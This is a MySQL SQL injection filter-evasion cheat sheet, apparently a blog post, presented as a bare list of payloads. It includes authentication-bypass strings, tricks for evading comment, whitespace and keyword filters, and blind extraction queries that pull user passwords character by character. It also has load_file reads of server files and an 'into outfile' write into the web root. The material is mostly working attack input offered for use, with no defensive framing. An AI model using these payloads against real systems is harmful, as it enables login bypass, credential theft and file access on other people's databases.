SQLi Filter evasion cheat sheet

1. ########################################### Thanks For Reading #######################################################
2. If You Like You Can Share This Post
3. ############ SQLi Filter evasion cheat sheet (MYSQL)
4.  
5. Basic Filter
6. Comments
7.  
8. Comments
9. ‘ or 1=1#
10. ‘ or 1=1– –
11. ‘ or 1=1/* (MySQL < 5.1)
12. ' or 1=1;%00
13. ' or 1=1 union select 1,2 as `
14. ' or#newline
15. 1='1
16. ' or– -newline
17. 1='1
18. ' /*!50000or*/1='1
19. ' /*!or*/1='1
20.  
21. Prefixes
22. + – ~ !
23. ‘ or –+2=- -!!!’2
24.  
25. Operators
26. ^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
27.  
28. Whitespaces
29. %20 %09 %0a %0b %0c %0d %a0 /**/
30. ‘or+(1)sounds/**/like“1“–%a0-
31. ‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#
32.  
33. Strings with quotes
34. SELECT ‘a’
35. SELECT “a”
36. SELECT n’a’
37. SELECT b’1100001′
38. SELECT _binary’1100001′
39. SELECT x’61’
40.  
41. Strings without quotes
42. ‘abc’ = 0x616263
43.  
44. Aliases
45. select pass as alias from users
46. select pass aliasalias from users
47. select pass`alias alias`from users
48.  
49. Typecasting
50. ‘ or true = ‘1 # or 1=1
51. ‘ or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1
52. ‘ or ‘1 # or true
53.  
54. Compare operator typecasting
55. select * from users where ‘a’=’b’=’c’
56. select * from users where (‘a’=’b’)=’c’
57. select * from users where (false)=’c’
58. select * from users where (0)=’c’
59. select * from users where (0)=0
60. select * from users where true
61. select * from users
62.  
63.  
64. Authentication bypass ‘=’
65. select * from users where name = ”=”
66. select * from users where false = ”
67. select * from users where 0 = 0
68. select * from users where true
69. select * from users
70.  
71. Authentication bypass ‘-‘
72. select * from users where name = ”-”
73. select * from users where name = 0-0
74. select * from users where 0 = 0
75. select * from users where true
76. select * from users
77. Function filter
78.  
79. General function filtering
80. ascii (97)
81. load_file/*foo*/(0x616263)
82.  
83. Strings with functions
84. ‘abc’ = unhex(616263)
85. ‘abc’ = char(97,98,99)
86. hex(‘a’) = 61
87. ascii(‘a’) = 97
88. ord(‘a’) = 97
89. ‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))
90.  
91. Strings extracted from gadgets
92. collation(\N) // binary
93. collation(user()) // utf8_general_ci
94. @@time_format // %H:%i:%s
95. @@binlog_format // MIXED
96. @@version_comment // MySQL Community Server (GPL)
97. dayname(from_days(401)) // Monday
98. dayname(from_days(403)) // Wednesday
99. monthname(from_days(690)) // November
100. monthname(from_unixtime(1)) // January
101. collation(convert((1)using/**/koi8r)) // koi8r_general_ci
102. (select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs
103.  
104. Special characters extracted from gadgets
105. aes_encrypt(1,12) // 4çh±{?”^c×HéÉEa
106. des_encrypt(1,2) // ‚GÒ/ïÖk
107. @@ft_boolean_syntax // + -><()~*:""&|
108. @@date_format // %Y-%m-%d
109. @@innodb_log_group_home_dir // .\
110.  
111. Integer representations
112. false: 0
113. true: 1
114. true+true: 2
115. floor(pi()): 3
116. ceil(pi()): 4
117. floor(version()): 5
118. ceil(version()): 6
119. ceil(pi()+pi()): 7
120. floor(version()+pi()): 8
121. floor(pi()*pi()): 9
122. ceil(pi()*pi()): 10
123. concat(true,true): 11
124. ceil(pi()*pi())+true: 11
125. ceil(pi()+pi()+version()): 12
126. floor(pi()*pi()+pi()): 13
127. ceil(pi()*pi()+pi()): 14
128. ceil(pi()*pi()+version()): 15
129. floor(pi()*version()): 16
130. ceil(pi()*version()): 17
131. ceil(pi()*version())+true: 18
132. floor((pi()+pi())*pi()): 19
133. ceil((pi()+pi())*pi()): 20
134. ceil(ceil(pi())*version()): 21
135. concat(true+true,true): 21
136. ceil(pi()*ceil(pi()+pi())): 22
137. ceil((pi()+ceil(pi()))*pi()): 23
138. ceil(pi())*ceil(version()): 24
139. floor(pi()*(version()+pi())): 25
140. floor(version()*version()): 26
141. ceil(version()*version()): 27
142. ceil(pi()*pi()*pi()-pi()): 28
143. floor(pi()*pi()*floor(pi())): 29
144. ceil(pi()*pi()*floor(pi())): 30
145. concat(floor(pi()),false): 30
146. floor(pi()*pi()*pi()): 31
147. ceil(pi()*pi()*pi()): 32
148. ceil(pi()*pi()*pi())+true: 33
149. ceil(pow(pi(),pi())-pi()): 34
150. ceil(pi()*pi()*pi()+pi()): 35
151. floor(pow(pi(),pi())): 36
152.  
153. @@new: 0
154. @@log_bin: 1
155.  
156. !pi(): 0
157. !!pi(): 1
158. true-~true: 3
159. log(-cos(pi())): 0
160. -cos(pi()): 1
161. coercibility(user()): 3
162. coercibility(now()): 4
163.  
164. minute(now())
165. hour(now())
166. day(now())
167. week(now())
168. month(now())
169. year(now())
170. quarter(now())
171. year(@@timestamp)
172. crc32(true)
173.  
174. Extract substrings
175. substr(‘abc’,1,1) = ‘a’
176. substr(‘abc’ from 1 for 1) = ‘a’
177. substring(‘abc’,1,1) = ‘a’
178. substring(‘abc’ from 1 for 1) = ‘a’
179. mid(‘abc’,1,1) = ‘a’
180. mid(‘abc’ from 1 for 1) = ‘a’
181. lpad(‘abc’,1,space(1)) = ‘a’
182. rpad(‘abc’,1,space(1)) = ‘a’
183. left(‘abc’,1) = ‘a’
184. reverse(right(reverse(‘abc’),1)) = ‘a’
185. insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’
186. space(0) = trim(version()from(version()))
187.  
188. Search substrings
189. locate(‘a’,’abc’)
190. position(‘a’,’abc’)
191. position(‘a’ IN ‘abc’)
192. instr(‘abc’,’a’)
193. substring_index(‘ab’,’b’,1)
194.  
195. Cut substrings
196. length(trim(leading ‘a’ FROM ‘abc’))
197. length(replace(‘abc’, ‘a’, ”))
198.  
199. Compare strings
200. strcmp(‘a’,’a’)
201. mod(‘a’,’a’)
202. find_in_set(‘a’,’a’)
203. field(‘a’,’a’)
204. count(concat(‘a’,’a’))
205.  
206. String length
207. length()
208. bit_length()
209. char_length()
210. octet_length()
211. bit_count()
212.  
213. String case
214. ucase
215. lcase
216. lower
217. upper
218. password(‘a’) != password(‘A’)
219. old_password(‘a’) != old_password(‘A’)
220. md5(‘a’) != md5(‘A’)
221. sha(‘a’) != sha(‘A’)
222. aes_encrypt(‘a’) != aes_encrypt(‘A’)
223. des_encrypt(‘a’) != des_encrypt(‘A’)
224. Keyword filter
225.  
226. Connected keyword filtering
227. (0)union(select(table_name),column_name,…
228. 0/**/union/*!50000select*/table_name`foo`/**/…
229. 0%a0union%a0select%09group_concat(table_name)….
230. 0’union all select all`table_name`foo from`information_schema`. `tables`
231.  
232. OR, AND
233. ‘||1=’1
234. ‘&&1=’1
235. ‘=’
236. ‘-‘
237.  
238. OR, AND, UNION
239. ‘ and (select pass from users limit 1)=’secret
240.  
241. OR, AND, UNION, LIMIT
242. ‘ and (select pass from users where id =1)=’a
243.  
244. OR, AND, UNION, LIMIT, WHERE
245. ‘ and (select pass from users group by id having id = 1)=’a
246.  
247. OR, AND, UNION, LIMIT, WHERE, GROUP
248. ‘ and length((select pass from users having substr(pass,1,1)=’a’))
249.  
250. OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
251. ‘ and (select substr(group_concat(pass),1,1) from users)=’a
252. ‘ and substr((select max(pass) from users),1,1)=’a
253. ‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a
254.  
255. OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
256. ‘ and substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)=’a
257. ‘=” into outfile ‘/var/www/dump.txt
258.  
259. OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
260. ‘ procedure analyse()#
261. ‘-if(name=’Admin’,1,0)#
262. ‘-if(if(name=’Admin’,1,0),if(substr(pass,1,1)=’a’,1,0),0)#
263.  
264. Control flow
265. case ‘a’ when ‘a’ then 1 [else 0] end
266. case when ‘a’=’a’ then 1 [else 0] end
267. if(‘a’=’a’,1,0)
268. ifnull(nullif(‘a’,’a’),1)